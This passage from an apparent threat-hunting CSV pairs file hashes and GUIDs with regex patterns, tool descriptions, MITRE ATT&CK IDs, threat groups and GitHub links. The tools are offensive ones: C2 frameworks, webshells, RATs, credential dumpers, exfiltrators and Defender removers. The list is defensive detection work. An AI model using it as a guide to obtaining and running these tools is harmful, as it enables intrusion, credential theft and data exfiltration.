"*2ce6ab2d48d613830f2cd7920ced86ca7b6782dbafe64af84ba476f71d08620e*",".{0,1000}2ce6ab2d48d613830f2cd7920ced86ca7b6782dbafe64af84ba476f71d08620e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23908" "*2cea373bf30e78ea980ffcece278ef5a41df27484103e6e57cb0084e34a65a5f*",".{0,1000}2cea373bf30e78ea980ffcece278ef5a41df27484103e6e57cb0084e34a65a5f.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","23909" "*2cf90c4ce3a4376653a8b7c236797ed5c3451134e05b299abd14629b8fab0a1b*",".{0,1000}2cf90c4ce3a4376653a8b7c236797ed5c3451134e05b299abd14629b8fab0a1b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23910" "*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*",".{0,1000}2CFB9E9E\-479D\-4E23\-9A8E\-18C92E06B731.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","#GUIDproject","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","23912" "*2d0029543e5781ba1136a85707546c7b3acafbaa56cf71e917c63cc2f7fea794*",".{0,1000}2d0029543e5781ba1136a85707546c7b3acafbaa56cf71e917c63cc2f7fea794.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","23913" "*2d00a5df9000f49c0b42ca0fe316103af9cc3bdf11bea4da5255690193d3ef21*",".{0,1000}2d00a5df9000f49c0b42ca0fe316103af9cc3bdf11bea4da5255690193d3ef21.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","#filehash","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","23914" "*2d07b219eaa35bbe5dafe4b618f53b293d69779ed3596432a41c12ec14bc0b42*",".{0,1000}2d07b219eaa35bbe5dafe4b618f53b293d69779ed3596432a41c12ec14bc0b42.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23919" "*2d171b19906b039677a1213f32d27a9e1e4a0b96e9e071f7a8e8bd8a72e46243*",".{0,1000}2d171b19906b039677a1213f32d27a9e1e4a0b96e9e071f7a8e8bd8a72e46243.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect 
to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","23920" "*2d212fbbfbf1e52bdd4a28a4a0957de7ab35357a0735279a0bfa3e6aecc0c145*",".{0,1000}2d212fbbfbf1e52bdd4a28a4a0957de7ab35357a0735279a0bfa3e6aecc0c145.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23921" "*2d24b7562b9165724b631386fc3e2af255e42bddedb3b05a297cb2251ad64e0d*",".{0,1000}2d24b7562b9165724b631386fc3e2af255e42bddedb3b05a297cb2251ad64e0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23922" "*2d270f4d110fbbc9d8806632a588073376e4c5657485e484c863fc10aa0515dc*",".{0,1000}2d270f4d110fbbc9d8806632a588073376e4c5657485e484c863fc10aa0515dc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23923" "*2d2e0ad0b515712ae445a179701ae0e61d759498bea45c9431ae93c1469e1172*",".{0,1000}2d2e0ad0b515712ae445a179701ae0e61d759498bea45c9431ae93c1469e1172.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","23924" "*2d320664154077c143296da336e7ac4bcc3f639cee91734ec0e4689b782d17eb*",".{0,1000}2d320664154077c143296da336e7ac4bcc3f639cee91734ec0e4689b782d17eb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23925" "*2d3430ea4340df7c6d2e81b8147292f9423871efd5b0da115bd3e9bb7498e014*",".{0,1000}2d3430ea4340df7c6d2e81b8147292f9423871efd5b0da115bd3e9bb7498e014.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - 
T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23926" "*2d35c7451ad9957e4a3c0cdccad1e8e9ac11a1c066cf0431ecf089b51ee8a763*",".{0,1000}2d35c7451ad9957e4a3c0cdccad1e8e9ac11a1c066cf0431ecf089b51ee8a763.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23927" "*2d3968ad60bdbc9528f95568aba38693ade0090f8d57707dc3e288d792587a35*",".{0,1000}2d3968ad60bdbc9528f95568aba38693ade0090f8d57707dc3e288d792587a35.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","23928" "*2d3ce0b49997314a863aa4a9ef25fe06021aac1107aaf63af18ba9730f13e7e3*",".{0,1000}2d3ce0b49997314a863aa4a9ef25fe06021aac1107aaf63af18ba9730f13e7e3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23929" "*2d4851e00169abc64ef2432424b1d8d0d41dd4b7ec143fb35d336f647530c82b*",".{0,1000}2d4851e00169abc64ef2432424b1d8d0d41dd4b7ec143fb35d336f647530c82b.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23932" "*2D4A23D2A7F25F007CB0B5E17F50B6B84C09560BFB3232B176E74AE4F97B3E89*",".{0,1000}2D4A23D2A7F25F007CB0B5E17F50B6B84C09560BFB3232B176E74AE4F97B3E89.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","23933" "*2d578c9039ded100955310b7c6cc6a8eeb447cbabe86a7baa3b2c873795f26f8*",".{0,1000}2d578c9039ded100955310b7c6cc6a8eeb447cbabe86a7baa3b2c873795f26f8.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23934" "*2d5d11ca0c75a828e3345af626a7b45bde92e1425f5d4fb1c178b7751c5c38c4*",".{0,1000}2d5d11ca0c75a828e3345af626a7b45bde92e1425f5d4fb1c178b7751c5c38c4.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","23935" 
"*2d6283f2487ebd6093546fc46eac56e5ce592c9ad5bfa70ee785ac0192a71d03*",".{0,1000}2d6283f2487ebd6093546fc46eac56e5ce592c9ad5bfa70ee785ac0192a71d03.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23937" "*2d64cabcf01bbdb919864475061ca0b5b14429faa6c1da87d575bfa0d56a9329*",".{0,1000}2d64cabcf01bbdb919864475061ca0b5b14429faa6c1da87d575bfa0d56a9329.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23938" "*2d69f2dcc84e24a3b4f8c8a465f0b3b27f30ce4d24d81e96079deeec0d540f41*",".{0,1000}2d69f2dcc84e24a3b4f8c8a465f0b3b27f30ce4d24d81e96079deeec0d540f41.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","23940" "*2d6fa1c8a808ef5f183950224a90249f798804b6634a6145f9506446076d39ea*",".{0,1000}2d6fa1c8a808ef5f183950224a90249f798804b6634a6145f9506446076d39ea.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23941" 
"*2D6FDD44-39B1-4FF8-8AE0-60A6B0979F5F*",".{0,1000}2D6FDD44\-39B1\-4FF8\-8AE0\-60A6B0979F5F.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","23942" "*2d7764b3561efab3e82c6f40f444e7700d5357ee4cf46cdf3233e37849153880*",".{0,1000}2d7764b3561efab3e82c6f40f444e7700d5357ee4cf46cdf3233e37849153880.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23943" "*2d837b6c7343aec8123077db07d3fb8f9f7e44c5b108bf713380b17dac7569b9*",".{0,1000}2d837b6c7343aec8123077db07d3fb8f9f7e44c5b108bf713380b17dac7569b9.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#filehash","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","23945" "*2D863D7A-A369-419C-B4B3-54BDB88B5816*",".{0,1000}2D863D7A\-A369\-419C\-B4B3\-54BDB88B5816.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. 
It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/itm4n/UsoDllLoader","1","0","#GUIDproject","N/A","N/A","4","386","100","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z","23946" "*2d90f3530da1d697231e3a82df8a94b062676960dd7d32e0899c027cdf66350c*",".{0,1000}2d90f3530da1d697231e3a82df8a94b062676960dd7d32e0899c027cdf66350c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23948" "*2d93db2abb0ea20a402c5d62e610e36d1957069b8612f7fd05d6be0a1d362c3b*",".{0,1000}2d93db2abb0ea20a402c5d62e610e36d1957069b8612f7fd05d6be0a1d362c3b.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","23951" "*2d970264f004706b30aba04627024af60227bd9da276cf924912d6a18bce8567*",".{0,1000}2d970264f004706b30aba04627024af60227bd9da276cf924912d6a18bce8567.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23952" "*2d9b32c3eb9cdb1b9574f2e462eeb5724ae761adab5780f6d6168aea828c19b1*",".{0,1000}2d9b32c3eb9cdb1b9574f2e462eeb5724ae761adab5780f6d6168aea828c19b1.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - 
TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23954" "*2da209fc877acf2adcbd7339bb759f38509ce4601bd8ed750648bf75cbed0e97*",".{0,1000}2da209fc877acf2adcbd7339bb759f38509ce4601bd8ed750648bf75cbed0e97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23955" "*2da7517e0a483825eea29726da1398bee9b68e739151ed4febcd6ceee6b85e01*",".{0,1000}2da7517e0a483825eea29726da1398bee9b68e739151ed4febcd6ceee6b85e01.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23958" "*2daeb177f86c873780c59e59fa8c424e45aea199bf5fb3e935310b043d41787f*",".{0,1000}2daeb177f86c873780c59e59fa8c424e45aea199bf5fb3e935310b043d41787f.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - 
TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#filehash","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","23959" "*2dba6fb126f4bdfc67fffd404746fe0dd38fc3fe7c72f97360df57b60e33155d*",".{0,1000}2dba6fb126f4bdfc67fffd404746fe0dd38fc3fe7c72f97360df57b60e33155d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23961" "*2dbdee080a73de51397300d3d17317f6a20e81e57322ff8ede6979ce81349405*",".{0,1000}2dbdee080a73de51397300d3d17317f6a20e81e57322ff8ede6979ce81349405.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","23962" "*2dc0932b1ec1f7be50038ddcfc69790ff8b8db824d0121a02aad709a9a92119f*",".{0,1000}2dc0932b1ec1f7be50038ddcfc69790ff8b8db824d0121a02aad709a9a92119f.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23963" "*2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac*",".{0,1000}2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23964" "*2dd2927d0f421a78f9289bee0e47449780a13ff7686a9d29c6afb0fec4c22576*",".{0,1000}2dd2927d0f421a78f9289bee0e47449780a13ff7686a9d29c6afb0fec4c22576.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","23965" "*2dd67e996df7577217a7fcc783610a7bb901655e1ce269157c6d935ea0dd510c*",".{0,1000}2dd67e996df7577217a7fcc783610a7bb901655e1ce269157c6d935ea0dd510c.{0,1000}","offensive_tool_keyword","Invoke-DNSteal","DNS Data Exfiltrator","T1071.004 - T1041 - T1048","TA0011 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/JoelGMSec/Invoke-DNSteal","1","0","#filehash","N/A","10","2","109","23","2023-07-17T11:26:19Z","2021-06-24T11:03:09Z","23966" "*2de3001b8720ed2ad3f7f25685172277a7032ddc098d2037860b4a067c0ba668*",".{0,1000}2de3001b8720ed2ad3f7f25685172277a7032ddc098d2037860b4a067c0ba668.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23967" "*2de627c776ab1a97d9ea2b3b16f63ef060cf4e0367f03861c85fec6106b2a7af*",".{0,1000}2de627c776ab1a97d9ea2b3b16f63ef060cf4e0367f03861c85fec6106b2a7af.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - 
TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","23968" "*2deff2ca-c313-4d85-aeee-414bac32e7ae*",".{0,1000}2deff2ca\-c313\-4d85\-aeee\-414bac32e7ae.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","#GUIDproject","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","23969" "*2df52ae297704f333af2c7e29544d0c00fcbbccaeb343a8588f9792d482b75a0*",".{0,1000}2df52ae297704f333af2c7e29544d0c00fcbbccaeb343a8588f9792d482b75a0.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","23972" "*2df9eb9a967a029221346b322e7861e6db914770fadb7e99fe98d4a37764d441*",".{0,1000}2df9eb9a967a029221346b322e7861e6db914770fadb7e99fe98d4a37764d441.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23974" "*2dfdcda3ae74c0e2e3e65adc1cf65676b9e4cbf1d8832aff955c8bd24ea8d280*",".{0,1000}2dfdcda3ae74c0e2e3e65adc1cf65676b9e4cbf1d8832aff955c8bd24ea8d280.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 
TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","23977" "*2e0515d20feeb3a1d5f368c85eaad188eb96d4beec0b38502413f5f7086e5857*",".{0,1000}2e0515d20feeb3a1d5f368c85eaad188eb96d4beec0b38502413f5f7086e5857.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23978" "*2e0680b916b117d6eff7e621212b7ac6f28c41b95a3fc18b91b13922e3e2e72f*",".{0,1000}2e0680b916b117d6eff7e621212b7ac6f28c41b95a3fc18b91b13922e3e2e72f.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 